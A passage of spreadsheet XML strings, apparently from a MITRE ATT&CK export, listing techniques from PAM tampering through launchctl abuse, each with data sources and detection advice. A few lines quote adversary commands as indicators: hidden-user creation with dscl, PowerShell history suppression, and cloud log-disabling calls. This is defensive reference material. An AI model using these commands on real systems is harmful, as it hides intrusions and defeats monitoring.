  <si>
    <t>File monitoring,DLL monitoring</t>
  </si>
  <si>
    <t>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</si>
  <si>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t>
  </si>
  <si>
    <t>T1556.003</t>
  </si>
  <si>
    <t>Pluggable Authentication Modules</t>
  </si>
  <si>
    <t>Authentication logs,File monitoring</t>
  </si>
  <si>
    <t>Monitor PAM configuration and module paths (ex: &lt;code&gt;/etc/pam.d/&lt;/code&gt;) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present)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</si>
  <si>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t>
  </si>
  <si>
    <t>T1556.004</t>
  </si>
  <si>
    <t>Network Device Authentication</t>
  </si>
  <si>
    <t>Consider verifying the checksum of the operating system file and verifying the image of the operating system in memory.(Citation: Cisco IOS Software Integrity Assurance - Image File Verification)(Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)
Detection of this behavior may be difficult, detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601).</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</si>
  <si>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FireEye - Synful Knock)</t>
  </si>
  <si>
    <t>T1557</t>
  </si>
  <si>
    <t>Man-in-the-Middle</t>
  </si>
  <si>
    <t>File monitoring,Netflow/Enclave netflow,Packet capture</t>
  </si>
  <si>
    <t>Monitor network traffic for anomalies associated with known MiTM behavior. Consider monitoring for modifications to system configuration files involved in shaping network traffic flow.</t>
  </si>
  <si>
    <t>Adversaries may attempt to position themselves between two or more networked devices using a man-in-the-middle (MiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002).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Adversaries may leverage the MiTM position to attempt to modify traffic, such as in [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). Adversaries can also stop traffic from flowing to the appropriate destination, causing denial of service.</t>
  </si>
  <si>
    <t>credential-access,collection</t>
  </si>
  <si>
    <t>T1557.001</t>
  </si>
  <si>
    <t>LLMNR/NBT-NS Poisoning and SMB Relay</t>
  </si>
  <si>
    <t>Windows event logs,Windows Registry,Packet capture,Netflow/Enclave netflow</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</si>
  <si>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tool.(Citation: GitHub Conveigh) Monitoring of Windows event logs for event IDs 4697 and 7045 may help in detecting successful relay techniques.(Citation: Secure Ideas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</si>
  <si>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 (Citation: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NTLMv2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it. (Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay)
Several tools exist that can be used to poison name services within local networks such as NBNSpoof, Metasploit, and [Responder](https://attack.mitre.org/software/S0174). (Citation: GitHub NBNSpoof) (Citation: Rapid7 LLMNR Spoofer) (Citation: GitHub Responder)</t>
  </si>
  <si>
    <t>T1557.002</t>
  </si>
  <si>
    <t>ARP Cache Poisoning</t>
  </si>
  <si>
    <t>Monitor network traffic for unusual ARP traffic, gratuitous ARP replies may be suspicious. 
Consider collecting changes to ARP caches across endpoints for signs of ARP poisoning. For example, if multiple IP addresses map to a single MAC address, this could be an indicator that the ARP cache has been poisoned.</t>
  </si>
  <si>
    <t xml:space="preserve">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man-in-the-middle (MiTM) network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
</t>
  </si>
  <si>
    <t>T1558</t>
  </si>
  <si>
    <t>Steal or Forge Kerberos Tickets</t>
  </si>
  <si>
    <t>Windows event logs,Authentication logs</t>
  </si>
  <si>
    <t>Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4672, 4634), RC4 encryption within ticket granting tickets (TGTs), and ticket granting service (TGS) requests without preceding TGT requests.(Citation: ADSecurity Detecting Forged Tickets)(Citation: Stealthbits Detect PtT 2019)(Citation: CERT-EU Golden Ticket Protection)
Monitor the lifetime of TGT tickets for values that differ from the default domain duration.(Citation: Microsoft Kerberos Golden Ticket)
Monitor for indications of [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) being used to move laterally. 
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 (Citation: AdSecurity Cracking Kerberos Dec 2015)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including Kerberos tickets, are stored.</t>
  </si>
  <si>
    <t>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Attackers may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.</t>
  </si>
  <si>
    <t>T1558.001</t>
  </si>
  <si>
    <t>Golden Ticket</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4672, 4634), RC4 encryption within TGTs, and TGS requests without preceding TGT requests.(Citation: ADSecurity Kerberos and KRBTGT)(Citation: CERT-EU Golden Ticket Protection)(Citation: Stealthbits Detect PtT 2019)
Monitor the lifetime of TGT tickets for values that differ from the default domain duration.(Citation: Microsoft Kerberos Golden Ticket)
Monitor for indications of [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) being used to move laterally. 
</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</si>
  <si>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</si>
  <si>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T1558.002</t>
  </si>
  <si>
    <t>Silver Ticket</t>
  </si>
  <si>
    <t>Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4634, 4672).(Citation: ADSecurity Detecting Forged Tickets) 
Monitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details, including Kerberos tickets, are stored.</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</si>
  <si>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</si>
  <si>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T1558.003</t>
  </si>
  <si>
    <t>Kerberoasting</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</si>
  <si>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2018)(Citation: AdSecurity Cracking Kerberos Dec 2015)</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</si>
  <si>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attack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</si>
  <si>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T1558.004</t>
  </si>
  <si>
    <t>AS-REP Roasting</t>
  </si>
  <si>
    <t>Enable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4768 and 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17], pre-authentication not required [Type: 0x0]).(Citation: AdSecurity Cracking Kerberos Dec 2015)(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation: Microsoft 4768 TGT 2017)</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</si>
  <si>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</si>
  <si>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T1559</t>
  </si>
  <si>
    <t>Inter-Process Communication</t>
  </si>
  <si>
    <t>Process monitoring,DLL monitoring,File monitoring</t>
  </si>
  <si>
    <t>Monitor for strings in files/commands, loaded DLLs/libraries, or spawned processes that are associated with abuse of IPC mechanisms.</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</si>
  <si>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Higher level execution mediums, such as those of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s, may also leverage underlying IPC mechanisms.</t>
  </si>
  <si>
    <t>T1559.001</t>
  </si>
  <si>
    <t>Component Object Model</t>
  </si>
  <si>
    <t>Process monitoring,DLL monitoring</t>
  </si>
  <si>
    <t xml:space="preserve">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</si>
  <si>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</si>
  <si>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T1559.002</t>
  </si>
  <si>
    <t>Dynamic Data Exchange</t>
  </si>
  <si>
    <t>Monitor processes for abnormal behavior indicative of DDE abuse, such as Microsoft Office applications loading DLLs and other modules not typically associated with the application or these applications spawning unusual processes (such as cmd.exe).
OLE and Office Open XML files can be scanned for ‘DDEAUTO', ‘DDE’, and other strings indicative of DDE execution.(Citation: NVisio Labs DDE Detection Oct 2017)</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</si>
  <si>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 (Citation: BleepingComputer DDE Disabled in Word Dec 2017) (Citation: Microsoft ADV170021 Dec 2017) (Citation: Microsoft DDE Advisory Nov 2017)
Microsoft Office documents can be poisoned with DDE commands (Citation: SensePost PS DDE May 2016) (Citation: Kettle CSV DDE Aug 2014), directly or through embedded files (Citation: Enigma Reviving DDE Jan 2018), and used to deliver execution via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros. (Citation: SensePost MacroLess DDE Oct 2017) DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).</t>
  </si>
  <si>
    <t>T1560</t>
  </si>
  <si>
    <t>Archive Collected Data</t>
  </si>
  <si>
    <t>Process monitoring,Process command-line parameters,File monitoring,Binary file metadata</t>
  </si>
  <si>
    <t>Archival software and archived files can be detected in many ways. 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A process that loads the Windows DLL crypt32.dll may be used to perform encryption, decryption, or verification of file signatures.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</si>
  <si>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</si>
  <si>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T1560.001</t>
  </si>
  <si>
    <t>Archive via Utility</t>
  </si>
  <si>
    <t>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</si>
  <si>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An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities. Many utilities exist that can archive data, including 7-Zip(Citation: 7zip Homepage), WinRAR(Citation: WinRAR Homepage), and WinZip(Citation: WinZip Homepage). Most utilities include functionality to encrypt and/or compress data.
Some 3rd party utilities may be preinstalled, such as `tar` on Linux and macOS or `zip` on Windows systems.</t>
  </si>
  <si>
    <t>T1560.002</t>
  </si>
  <si>
    <t>Archive via Library</t>
  </si>
  <si>
    <t>Monitor processes for accesses to known archival libraries.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</si>
  <si>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</si>
  <si>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T1560.003</t>
  </si>
  <si>
    <t>Archive via Custom Method</t>
  </si>
  <si>
    <t>Custom archival methods can be very difficult to detect, since many of them use standard programming language concepts, such as bitwise operations.</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</si>
  <si>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</si>
  <si>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T1561</t>
  </si>
  <si>
    <t>Disk Wipe</t>
  </si>
  <si>
    <t>Kernel drivers,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Look for attempts to read/write to sensitive locations like the partition boot sector, master boot record, disk partition table, or BIOS parameter block/superblock. Monitor for direct access read/write attempts using the &lt;code&gt;\\\\.\\&lt;/code&gt; notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.</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</si>
  <si>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</si>
  <si>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T1561.001</t>
  </si>
  <si>
    <t>Disk Content Wipe</t>
  </si>
  <si>
    <t>Look for attempts to read/write to sensitive locations like the partition boot sector or BIOS parameter block/superblock. Monitor for direct access read/write attempts using the &lt;code&gt;\\\\.\\&lt;/code&gt; notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.</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</si>
  <si>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</si>
  <si>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T1561.002</t>
  </si>
  <si>
    <t>Disk Structure Wipe</t>
  </si>
  <si>
    <t>Look for attempts to read/write to sensitive locations like the master boot record and the disk partition table. Monitor for direct access read/write attempts using the &lt;code&gt;\\\\.\\&lt;/code&gt; notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.</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</si>
  <si>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</si>
  <si>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T1562</t>
  </si>
  <si>
    <t>Impair Defenses</t>
  </si>
  <si>
    <t>GCP audit logs,Azure activity logs,AWS CloudTrail logs,Anti-virus,Services,API monitoring,Environment variable,Authentication logs,File monitoring,Process command-line parameters,Process monitoring,Windows Registry</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments to see if security tools or logging services are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools.  Lack of log events may be suspicious.
Monitor environment variables and APIs that can be leveraged to disable security measures.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</si>
  <si>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could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.</t>
  </si>
  <si>
    <t>Anti-virus,Signature-based detection,Host intrusion prevention systems,File monitoring,Digital Certificate Validation,Host forensic analysis,Log analysis,Firewall</t>
  </si>
  <si>
    <t>T1562.001</t>
  </si>
  <si>
    <t>Disable or Modify Tools</t>
  </si>
  <si>
    <t>Process command-line parameters,Windows Registry,Services,File monitoring</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments to see if security tools are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools. Lack of log events may be suspicious.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</si>
  <si>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tools scanning or reporting information.</t>
  </si>
  <si>
    <t>Anti-virus,Log analysis,Signature-based detection,Host intrusion prevention systems,File monitoring</t>
  </si>
  <si>
    <t>T1562.002</t>
  </si>
  <si>
    <t>Disable Windows Event Logging</t>
  </si>
  <si>
    <t>Process monitoring,Windows event logs,Process command-line parameters</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for commands that can be used to disable logging. Lack of event logs may be suspicious.</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</si>
  <si>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Adversaries may targeting system-wide logging or just that of a particular application. By disabling Windows event logging, adversaries can operate while leaving less evidence of a compromise behind.</t>
  </si>
  <si>
    <t>T1562.003</t>
  </si>
  <si>
    <t>Impair Command History Logging</t>
  </si>
  <si>
    <t>PowerShell logs,Process command-line parameters,Environment variable,File monitoring,Authentication logs,Process monitoring</t>
  </si>
  <si>
    <t xml:space="preserve">Correlating a user session with a distinct lack of new commands in their &lt;code&gt;.bash_history&lt;/code&gt; can be a clue to suspicious behavior. Additionally, users checking or changing their &lt;code&gt;HISTCONTROL&lt;/code&gt;, &lt;code&gt;HISTFILE&lt;/code&gt;, or &lt;code&gt;HISTFILESIZE&lt;/code&gt; environment variables may be suspicious.
Monitor for modification of PowerShell command history settings through processes being created with &lt;code&gt;-HistorySaveStyle SaveNothing&lt;/code&gt; command-line arguments and use of the PowerShell commands &lt;code&gt;Set-PSReadlineOption -HistorySaveStyle SaveNothing&lt;/code&gt; and &lt;code&gt;Set-PSReadLineOption -HistorySavePath {File Path}&lt;/code&gt;. </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</si>
  <si>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t>
  </si>
  <si>
    <t>T1562.004</t>
  </si>
  <si>
    <t>Disable or Modify System Firewall</t>
  </si>
  <si>
    <t>File monitoring,Process command-line parameters,Windows Registry</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments to see if firewalls are disabled or modified. Monitor Registry edits to keys that manage firewalls.</t>
  </si>
  <si>
    <t xml:space="preserve">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t>
  </si>
  <si>
    <t>T1562.006</t>
  </si>
  <si>
    <t>Indicator Blocking</t>
  </si>
  <si>
    <t>Process command-line parameters,Process monitoring,Sensor health and status</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</si>
  <si>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For example, Sysmon will log when its configuration state has changed (Event ID 16) and Windows Management Instrumentation (WMI) may be used to subscribe ETW providers that log any provider removal from a specific trace session. (Citation: Medium Event Tracing Tampering 2018) To detect changes in ETW you can also monitor the registry key which contains configurations for all ETW event providers: &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\AUTOLOGGER_NAME\{PROVIDER_GUID}&lt;/code&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting (Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW),(Citation: Microsoft About Event Tracing 2018) by tampering settings that control the collection and flow of event telemetry. (Citation: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t>
  </si>
  <si>
    <t>Host intrusion prevention systems,Anti-virus,Anti-virus</t>
  </si>
  <si>
    <t>T1562.007</t>
  </si>
  <si>
    <t>Disable or Modify Cloud Firewall</t>
  </si>
  <si>
    <t>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</t>
  </si>
  <si>
    <t>Monitor cloud logs for modification or creation of new security groups or firewall rules.</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</si>
  <si>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connectivity.(Citation: Expel IO Evil in AWS)
Modifying or disabling a cloud firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed.</t>
  </si>
  <si>
    <t>T1562.008</t>
  </si>
  <si>
    <t>Disable Cloud Logs</t>
  </si>
  <si>
    <t>AWS CloudTrail logs,Azure activity logs,GCP audit logs</t>
  </si>
  <si>
    <t>Monitor logs for API calls to disable logging. In AWS, monitor for: &lt;code&gt;StopLogging&lt;/code&gt; and &lt;code&gt;DeleteTrail&lt;/code&gt;.(Citation: Stopping CloudTrail from Sending Events to CloudWatch Logs) In GCP, monitor for: &lt;code&gt;google.logging.v2.ConfigServiceV2.UpdateSink&lt;/code&gt;.(Citation: Configuring Data Access audit logs)  In Azure, monitor for &lt;code&gt;az monitor diagnostic-settings delete&lt;/code&gt;.(Citation: az monitor diagnostic-settings) Additionally, a sudden loss of a log source may indicate that it has been disabled.</t>
  </si>
  <si>
    <t>An adversary may disable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attacker has sufficient permissions, they can disable logging to avoid detection of their activities. For example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic)</t>
  </si>
  <si>
    <t>T1563</t>
  </si>
  <si>
    <t>Remote Service Session Hijacking</t>
  </si>
  <si>
    <t>Process command-line parameters,Process monitoring,Netflow/Enclave netflow,Authentication logs</t>
  </si>
  <si>
    <t>Use of these services may be legitimate, depending upon the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with that service. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.
Monitor for processes and command-line arguments associated with hijacking service sessions.</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</si>
  <si>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</si>
  <si>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T1563.001</t>
  </si>
  <si>
    <t>SSH Hijacking</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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1563.002</t>
  </si>
  <si>
    <t>RDP Hijacking</t>
  </si>
  <si>
    <t>Consider monitoring processes for `tscon.exe` usage and monitor service creation that uses `cmd.exe /k` or `cmd.exe /c` in its arguments to detect RDP session hijacking.
Use of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP.</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</si>
  <si>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</si>
  <si>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T1564</t>
  </si>
  <si>
    <t>Hide Artifacts</t>
  </si>
  <si>
    <t>API monitoring,PowerShell logs,Authentication logs,Process command-line parameters,Process monitoring,File monitoring</t>
  </si>
  <si>
    <t>Monitor files, processes, and command-line arguments for actions indicative of hidden artifacts. Monitor event and authentication logs for records of hidden artifacts being used. Monitor the file system and shell commands for hidden attribute usage.</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</si>
  <si>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</si>
  <si>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T1564.001</t>
  </si>
  <si>
    <t>Hidden Files and Directories</t>
  </si>
  <si>
    <t>Monitor the file system and shell commands for files being created with a leading "." and the Windows command-line use of attrib.exe to add the hidden attribute.</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</si>
  <si>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</si>
  <si>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T1564.002</t>
  </si>
  <si>
    <t>Hidden Users</t>
  </si>
  <si>
    <t>File monitoring,Authentication logs</t>
  </si>
  <si>
    <t>This technique prevents the new user from showing up at the log in screen, but all of the other signs of a new user still exist. The user still gets a home directory and will appear in the authentication logs.</t>
  </si>
  <si>
    <t>Adversaries may use hidden users to mask the presence of user accounts they create. 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When using the [Create Account](https://attack.mitre.org/techniques/T1136) technique with a userID under 500 (ex: &lt;code&gt;sudo dscl . -create /Users/username UniqueID 401&lt;/code&gt;) and enabling this property (setting it to Yes), an adversary can conceal user accounts. (Citation: Cybereason OSX Pirrit).</t>
  </si>
  <si>
    <t>T1564.003</t>
  </si>
  <si>
    <t>Hidden Window</t>
  </si>
  <si>
    <t>File monitoring,Process monitoring,Process command-line parameters,PowerShell logs</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for actions indicative of hidden windows. In Windows, enable and configure event logging and PowerShell logging to check for the hidden window style. In MacOS, plist files are ASCII text files with a specific format, so they're relatively easy to parse. File monitoring can check for the &lt;code&gt;apple.awt.UIElement&lt;/code&gt; or any other suspicious plist tag in plist files and flag them.</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</si>
  <si>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</si>
  <si>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T1564.004</t>
  </si>
  <si>
    <t>NTFS File Attributes</t>
  </si>
  <si>
    <t>Process command-line parameters,API monitoring,File monitoring</t>
  </si>
  <si>
    <t>Forensic techniques exist to identify information stored in NTFS EA. (Citation: Journey into IR ZeroAccess NTFS EA) Monitor calls to the &lt;code&gt;ZwSetEaFile&lt;/code&gt; and &lt;code&gt;ZwQueryEaFile&lt;/code&gt;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</si>
  <si>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</si>
  <si>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Anti-virus,Host forensic analysis,Signature-based detection</t>
  </si>
  <si>
    <t>T1564.005</t>
  </si>
  <si>
    <t>Hidden File System</t>
  </si>
  <si>
    <t>File monitoring,Windows Registry</t>
  </si>
  <si>
    <t>Detecting the use of a hidden file system may be exceptionally difficult depending on the implementation. Emphasis may be placed on detecting related aspects of the adversary lifecycle, such as how malware interacts with the hidden file system or how a hidden file system is loaded. Consider looking for anomalous interactions with the Registry or with a particular file on disk. Likewise, if the hidden file system is loaded on boot from reserved disk space, consider shifting focus to detecting [Bootkit](https://attack.mitre.org/techniques/T1542/003) activity.</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</si>
  <si>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</si>
  <si>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T1564.006</t>
  </si>
  <si>
    <t>Run Virtual Instance</t>
  </si>
  <si>
    <t>Packet capture,Host network interface,Windows Registry,File monitoring,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Consider monitoring for files and processes associated with running a virtual instance, such as binary files associated with common virtualization technologies (ex: VirtualBox, VMware, QEMU, Hyper-V). Consider monitoring for process command-line arguments that may be atypical for benign use of virtualization software. Usage of virtualization binaries or command-line arguments associated with running a headless (in the background with no UI) virtual instance may be especially suspect. Network adapter information may also be helpful in detecting the use of virtual instances.
If virtualization software is installed by the adversary, the Registry may provide detection opportunities. Consider monitoring for [Windows Service](https://attack.mitre.org/techniques/T1543/003), with respect to virtualization software. 
Benign usage of virtualization technology is common in enterprise environments, data and events should not be viewed in isolation, but as part of a chain of behavior.</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</si>
  <si>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</si>
  <si>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T1564.007</t>
  </si>
  <si>
    <t>VBA Stomping</t>
  </si>
  <si>
    <t>Detection efforts should be placed finding differences between VBA source code and p-code.(Citation: Walmart Roberts Oct 2018) VBA code can be extracted from p-code before execution with tools such as the pcodedmp disassembler. The oletools toolkit leverages the pcodedmp disassembler to detect VBA stomping by comparing keywords present in the VBA source code and p-code.(Citation: pcodedmp Bontchev)(Citation: oletools toolkit)
If the document is opened with a Graphical User Interface (GUI) the malicious p-code is decompiled and may be viewed. However, if the &lt;code&gt;PROJECT&lt;/code&gt; stream, which specifies the project properties, is modified in a specific way the decompiled VBA code will not be displayed. For example, adding a module name that is undefined to the &lt;code&gt;PROJECT&lt;/code&gt; stream will inhibit attempts of reading the VBA source code through the GUI.(Citation: FireEye VBA stomp Feb 2020)</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</si>
  <si>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</si>
  <si>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T1565</t>
  </si>
  <si>
    <t>Data Manipulation</t>
  </si>
  <si>
    <t>Packet capture,Network protocol analysis,File monitoring,Application logs</t>
  </si>
  <si>
    <t>Where applicable, inspect important file hashes, locations, and modifications for suspicious/unexpected values. With some critical processes involving transmission of data, manual or out-of-band integrity checking may be useful for identifying manipulated data.</t>
  </si>
  <si>
    <t>Adversaries may insert, delete, or manipulate data in order to manipulate external outcomes or hide activity.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</si>
  <si>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T1565.001</t>
  </si>
  <si>
    <t>Stored Data Manipulation</t>
  </si>
  <si>
    <t>File monitoring,Application logs</t>
  </si>
  <si>
    <t>Where applicable, inspect important file hashes, locations, and modifications for suspicious/unexpected values.</t>
  </si>
  <si>
    <t>Adversaries may insert, delete, or manipulate data at rest in order to manipulate external outcomes or hide activity.(Citation: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</si>
  <si>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T1565.002</t>
  </si>
  <si>
    <t>Transmitted Data Manipulation</t>
  </si>
  <si>
    <t>Packet capture,Network protocol analysis</t>
  </si>
  <si>
    <t xml:space="preserve">Detecting the manipulation of data as at passes over a network can be difficult without the appropriate tools. In some cases integrity verification checks, such as file hashing, may be used on critical files as they transit a network. With some critical processes involving transmission of data, manual or out-of-band integrity checking may be useful for identifying manipulated data. </t>
  </si>
  <si>
    <t>Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity.(Citation: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</si>
  <si>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T1565.003</t>
  </si>
  <si>
    <t>Runtime Data Manipulation</t>
  </si>
  <si>
    <t>Inspect important application binary file hashes, locations, and modifications for suspicious/unexpected values.</t>
  </si>
  <si>
    <t>Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user.(Citation: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</si>
  <si>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T1566</t>
  </si>
  <si>
    <t>Phishing</t>
  </si>
  <si>
    <t>File monitoring,Packet capture,Web proxy,Email gateway,Mail server,Network intrusion detection system,Detonation chamber,SSL/TLS inspection,Anti-virus</t>
  </si>
  <si>
    <t>Linux,macOS,Windows,SaaS,Office 365</t>
  </si>
  <si>
    <t>Network intrusion detection systems and email gateways can be used to detect phishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.
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most common third-party services used for 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Many possible detections of follow-on behavior may take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs.</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</si>
  <si>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or to gather credentials for use of [Valid Accounts](https://attack.mitre.org/techniques/T1078). Phishing may also be conducted via third-party services, like social media platforms.</t>
  </si>
  <si>
    <t>T1566.001</t>
  </si>
  <si>
    <t>Spearphishing Attachment</t>
  </si>
  <si>
    <t>File monitoring,Packet capture,Network intrusion detection system,Detonation chamber,Email gateway,Mail server</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</si>
  <si>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or usage of malicious scripts.</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</si>
  <si>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</si>
  <si>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T1566.002</t>
  </si>
  <si>
    <t>Spearphishing Link</t>
  </si>
  <si>
    <t>Packet capture,Web proxy,Email gateway,Detonation chamber,SSL/TLS inspection,DNS records,Mail server</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</si>
  <si>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this technique usually involves user interaction on the endpoint, many of the possible detections take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs.</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</si>
  <si>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 Links may also direct users to malicious applications  designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, in order to gain access to protected applications and information.(Citation: Trend Micro Pawn Storm OAuth 2017)</t>
  </si>
  <si>
    <t>T1566.003</t>
  </si>
  <si>
    <t>Spearphishing via Service</t>
  </si>
  <si>
    <t>SSL/TLS inspection,Anti-virus,Web proxy</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</si>
  <si>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or usage of malicious scripts.</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</si>
  <si>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</si>
  <si>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T1567</t>
  </si>
  <si>
    <t>Exfiltration Over Web Service</t>
  </si>
  <si>
    <t>Process monitoring,Process use of network,Packet capture,Netflow/Enclave netflow,Network protocol analysis,SSL/TLS inspection</t>
  </si>
  <si>
    <t>Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. User behavior monitoring may help to detect abnormal patterns of activity.</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</si>
  <si>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</si>
  <si>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T1567.001</t>
  </si>
  <si>
    <t>Exfiltration to Code Repository</t>
  </si>
  <si>
    <t>Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server) to code repositories. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. User behavior monitoring may help to detect abnormal patterns of activity.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</si>
  <si>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</si>
  <si>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T1567.002</t>
  </si>
  <si>
    <t>Exfiltration to Cloud Storage</t>
  </si>
  <si>
    <t>Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server) to known cloud storage services. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. User behavior monitoring may help to detect abnormal patterns of activity.</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</si>
  <si>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</si>
  <si>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T1568</t>
  </si>
  <si>
    <t>Dynamic Resolution</t>
  </si>
  <si>
    <t>SSL/TLS inspection,Web logs,DNS records</t>
  </si>
  <si>
    <t>Detecting dynamically generated C2 can be challenging due to the number of different algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There are multiple approaches to detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more (Citation: Data Driven Security DGA). CDN domains may trigger these detections due to the format of their domain names. In addition to detecting algorithm generated domains based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.</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</si>
  <si>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</si>
  <si>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T1568.001</t>
  </si>
  <si>
    <t>Fast Flux DNS</t>
  </si>
  <si>
    <t>DNS records</t>
  </si>
  <si>
    <t>In general, detecting usage of fast flux DNS is difficult due to web traffic load balancing that services client requests quickly. In single flux cases only IP addresses change for static domain names. In double flux cases, nothing is static. Defenders such as domain registrars and service providers are likely in the best position for detection.</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</si>
  <si>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</si>
  <si>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T1568.002</t>
  </si>
  <si>
    <t>Domain Generation Algorithms</t>
  </si>
  <si>
    <t>DNS records,Netflow/Enclave netflow,Network device logs,Packet capture,Process use of network</t>
  </si>
  <si>
    <t>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is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Endgame Predicting DGA)</t>
  </si>
  <si>
    <t>Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders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</si>
  <si>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T1568.003</t>
  </si>
  <si>
    <t>DNS Calculation</t>
  </si>
  <si>
    <t>Detection for this technique is difficult because it would require knowledge of the specific implementation of the port calculation algorithm. Detection may be possible by analyzing DNS records if the algorithm is known.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</si>
  <si>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</si>
  <si>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T1569</t>
  </si>
  <si>
    <t>System Services</t>
  </si>
  <si>
    <t>Windows Registry,Process command-line parameters,Process monitoring,File monitoring</t>
  </si>
  <si>
    <t>Monitor for command line invocations of tools capable of modifying services that doesn’t correspond to normal usage patterns and known software, patch cycles, etc. Also monitor for changes to executables and other files associated with services. Changes to Windows services may also be reflected in the Registry.</t>
  </si>
  <si>
    <t>Adversaries may abuse system services or daemons to execute commands or programs. Adversaries can execute malicious content by interacting with or creating services. Many services are set to run at boot, which can aid in achieving persistence ([Create or Modify System Process](https://attack.mitre.org/techniques/T1543)), but adversaries can also abuse services for one-time or temporary execution.</t>
  </si>
  <si>
    <t>T1569.001</t>
  </si>
  <si>
    <t>Launchctl</t>
  </si>
  <si>
    <t>KnockKnock can be used to detect persistent programs such as those installed via launchctl as launch agents or launch daemons. Additionally, every launch agent or launch daemon must have a corresponding plist file on disk which can be monitored. Monitor process execution from launchctl/launchd for unusual or unknown processes.</t>
  </si>
  <si>
    <t>Adversaries may abuse launchctl to execute commands or programs. Launchctl controls the macOS launchd process, which handles things like [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s and [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s, but can execute other commands or programs itself. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man)
